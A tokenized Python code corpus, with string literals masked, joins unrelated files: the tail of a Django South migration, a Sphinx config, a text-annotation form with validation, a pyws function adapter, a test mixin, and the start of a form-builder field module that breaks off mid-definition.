[ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:file>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:file>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:float>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:width>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import sys , os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> from django . conf import settings <EOL> if not settings . configured : <EOL> settings . configure ( <EOL> SMS_BACKEND = '<STR_LIT>' , <EOL> ) <EOL> extensions = [ '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] </s>
<s> import re <EOL> from django import forms <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from annotatetext . models import Annotation , ANNOTATION_FLAGS <EOL> class NewAnnotationForm ( forms . Form ) : <EOL> selection_start = forms . IntegerField ( required = True ) <EOL> selection_end = forms . IntegerField ( required = True ) <EOL> flags = forms . ChoiceField ( choices = enumerate ( ANNOTATION_FLAGS ) , widget = forms . Select ( attrs = { "<STR_LIT:class>" : "<STR_LIT>" } ) , required = True ) <EOL> content_type = forms . IntegerField ( widget = forms . HiddenInput , required = True ) <EOL> object_id = forms . IntegerField ( widget = forms . HiddenInput , required = True ) <EOL> comment = forms . CharField ( widget = forms . Textarea ( attrs = { '<STR_LIT>' : <NUM_LIT:50> , '<STR_LIT>' : <NUM_LIT:3> } ) , required = False ) <EOL> color = forms . CharField ( initial = "<STR_LIT>" , widget = forms . TextInput ( attrs = { "<STR_LIT:size>" : <NUM_LIT:6> } ) , required = False ) <EOL> lengthcheck = forms . IntegerField ( widget = forms . HiddenInput , required = True ) <EOL> def clean_color ( self ) : <EOL> data = self . cleaned_data [ "<STR_LIT>" ] <EOL> data = data . lower ( ) <EOL> if re . match ( "<STR_LIT>" , data ) is None : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> return data <EOL> def clean_flags ( self ) : <EOL> flags = self . cleaned_data [ "<STR_LIT>" ] <EOL> flags = int ( flags ) <EOL> if not flags in range ( len ( ANNOTATION_FLAGS ) ) : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> return flags <EOL> def clean ( self ) : <EOL> cleaned_data = self . cleaned_data <EOL> content_type_id = cleaned_data . get ( "<STR_LIT>" , None ) <EOL> object_id = cleaned_data . get ( "<STR_LIT>" , None ) <EOL> if content_type_id is None or object_id is None : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> try : <EOL> ct = ContentType . objects . get ( id = content_type_id ) <EOL> except ContentType . DoesNotExist : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> try : <EOL> obj = ct . get_object_for_this_type ( id = object_id ) <EOL> except ct . model_class ( ) . DoesNotExist : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> cleaned_data [ "<STR_LIT>" ] = ct <EOL> if not getattr ( obj , "<STR_LIT>" , False ) : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> if not hasattr ( obj , Annotation . field_name ) : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> text = getattr ( obj , Annotation . field_name ) <EOL> if len ( text ) != cleaned_data [ "<STR_LIT>" ] : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> if not "<STR_LIT>" in cleaned_data or not "<STR_LIT>" in cleaned_data : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> if not Annotation . validate_selection ( text , start = cleaned_data [ "<STR_LIT>" ] , end = cleaned_data [ "<STR_LIT>" ] ) : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> if "<STR_LIT>" not in cleaned_data or "<STR_LIT>" not in cleaned_data : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> return cleaned_data </s>
<s> from inspect import getargspec <EOL> from pyws . functions . args import DictOf , TypeFactory <EOL> from pyws . utils import cached_property <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' , ) <EOL> CONTEXT_ARG_NAME = '<STR_LIT>' <EOL> class Function ( object ) : <EOL> """<STR_LIT>""" <EOL> name = None <EOL> documentation = None <EOL> return_type = None <EOL> args = None <EOL> needs_context = False <EOL> def __call__ ( self , context , ** args ) : <EOL> """<STR_LIT>""" <EOL> args = self . validate ( args ) <EOL> if self . needs_context : <EOL> if isinstance ( context , Exception ) : <EOL> raise context <EOL> args [ CONTEXT_ARG_NAME ] = context <EOL> return self . call ( ** args ) <EOL> @ cached_property <EOL> def type_name ( self ) : <EOL> return self . name <EOL> @ cached_property <EOL> def wrapped_return_type ( self ) : <EOL> return args . DictOf ( <EOL> self . type_name + '<STR_LIT>' , args . Field ( '<STR_LIT:result>' , self . return_type ) ) <EOL> def validate ( self , args ) : <EOL> return self . args . validate ( args ) <EOL> def call ( self , ** args ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class NativeFunctionAdapter ( Function ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( <EOL> self , origin , <EOL> name = None , return_type = str , args = None , needs_context = False ) : <EOL> """<STR_LIT>""" <EOL> self . origin = origin <EOL> self . name = name or origin . __name__ <EOL> self . documentation = origin . __doc__ <EOL> self . return_type = TypeFactory ( return_type or str ) <EOL> self . needs_context = needs_context <EOL> arg_names = [ ( x , ) for x in getargspec ( origin ) [ <NUM_LIT:0> ] <EOL> if not needs_context or x != CONTEXT_ARG_NAME ] <EOL> if not args : <EOL> args = ( str , ) * len ( arg_names ) <EOL> args_ = map ( lambda x : x [ <NUM_LIT:0> ] + x [ <NUM_LIT:1> ] , zip ( arg_names , <EOL> map ( lambda arg : isinstance ( arg , tuple ) and arg or ( arg , ) , args ) ) ) <EOL> self . args = DictOf ( self . type_name , * args_ ) <EOL> def call ( self , ** args ) : <EOL> """<STR_LIT>""" <EOL> return self . origin ( ** args ) </s>
<s> from factory import build_client <EOL> class BaseTestCaseMixin ( object ) : <EOL> def setUp ( self ) : <EOL> client = build_client ( ) <EOL> self . client = client <EOL> self . service = client . service <EOL> self . factory = client . factory </s>
<s> from __future__ import unicode_literals <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django import forms <EOL> from django . forms . extras import SelectDateWidget <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from forms_builder . forms . settings import USE_HTML5 , EXTRA_FIELDS , EXTRA_WIDGETS <EOL> from forms_builder . forms . utils import html5_field , import_attr <EOL> TEXT = <NUM_LIT:1> <EOL> TEXTAREA = <NUM_LIT:2> <EOL> EMAIL = <NUM_LIT:3> <EOL> CHECKBOX = <NUM_LIT:4> <EOL> CHECKBOX_MULTIPLE = <NUM_LIT:5> <EOL> SELECT = <NUM_LIT:6> <EOL> SELECT_MULTIPLE = <NUM_LIT:7> <EOL> RADIO_MULTIPLE = <NUM_LIT:8> <EOL> FILE = <NUM_LIT:9> <EOL> DATE = <NUM_LIT:10> <EOL> DATE_TIME = <NUM_LIT:11> <EOL> HIDDEN = <NUM_LIT:12> <EOL> NUMBER = <NUM_LIT> <EOL> URL = <NUM_LIT> <EOL> DOB = <NUM_LIT:15> <EOL> NAMES = ( <EOL> ( TEXT , _ ( "<STR_LIT>" ) ) , <EOL> ( TEXTAREA , _ ( "<STR_LIT>" ) ) , <EOL> ( EMAIL , _ ( "<STR_LIT>" ) ) , <EOL> ( NUMBER , _ ( "<STR_LIT>" ) ) , <EOL> ( URL , _ ( "<STR_LIT>" ) ) , <EOL> ( CHECKBOX , _ ( "<STR_LIT>" ) ) , <EOL> ( CHECKBOX_MULTIPLE , _ ( "<STR_LIT>" ) ) , <EOL> ( SELECT , _ ( "<STR_LIT>" ) ) , <EOL> ( SELECT_MULTIPLE , _ ( "<STR_LIT>" ) ) , <EOL> ( RADIO_MULTIPLE , _ ( "<STR_LIT>" ) ) , <EOL> ( FILE , _ ( "<STR_LIT>" ) ) , <EOL> ( DATE , _ ( "<STR_LIT>" ) ) , <EOL> ( DATE_TIME , _ ( "<STR_LIT>" ) ) , <EOL> ( DOB , _ ( "<STR_LIT>" ) ) , <EOL> ( HIDDEN , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> CLASSES = { <EOL> TEXT : forms . CharField , <EOL> TEXTAREA : forms . CharField , <EOL> EMAIL : forms . EmailField , <EOL> 